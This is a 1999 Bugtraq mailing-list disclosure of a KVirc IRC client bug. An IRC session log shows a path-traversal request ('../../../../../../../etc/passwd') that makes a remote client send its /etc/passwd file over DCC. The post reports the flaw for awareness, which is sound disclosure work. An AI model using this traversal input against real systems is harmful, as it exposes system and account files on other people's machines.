[12014] in bugtraq
Kvirc bug
daemon@ATHENA.MIT.EDU (=?iso-8859-1?Q?Rodolfo_Garcia_Pe=F)
Mon Sep 27 15:11:30 1999
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Description: Text
Content-Transfer-Encoding: 8bit
Message-Id: <19990924225947.B3424@hell.darkness.org>
Date: Fri, 24 Sep 1999 22:59:47 +0200
Reply-To: kix@hispalinux.es
From: =?iso-8859-1?Q?Rodolfo_Garcia_Pe=F1as?= <kix@HISPALINUX.ES>
To: BUGTRAQ@SECURITYFOCUS.COM
Hi,
The irc client Kvirc has this bug:
foo> his
kix>/ctcp foo
-:- CTCP VERSION reply from foo: Running KVirc 0.9.0 by Szymon
'Pragma@ircnet' Stefanek <kvirc@tin.it> MASH War By iNGENI{}
0.95
!!!! http://move.to/ingenio Be afraid, this is not MiRc, esto es
LINUX!
<kix> !foo ../../../../../../../etc/passwd
-:- DCC GET (passwd) request from
foo[~var@ipaddress.org
[62.81.101.74:1043]] 778 bytes
<kix>/dcc
# | Type | Nick | Percent Complete | K/s | File
------------------------------------------------------------------------------
#2 GET foo Offer N/A passwd
<kix>/dcc get foo
-:- DCC GET with foo[62.81.101.74:1043] established
-:- DCC GET:passwd [778bytes] from foo completed in 0.9885 secs (787.1
bytes/sec)
Byez.
--
-------------------------------------------------------
____ ___ ___ ___
| | / / / / \ / /
| |/ / / /\ \ / /
| / / / / \ \/ / Rodolfo Garcma Peqas
| \ \ / / / /\ \ kix@hispalinux.es
| |\ \ / / / \ \ http://slug.ctv.es/~kix
| | \ \/ / / \ \
The Face of Your NightMare
Register Linux User 87577. Powered by Debian potato
Kernel 2.2.12 - The love is now in my blood -
She changed me, now I am not a machine, I can feel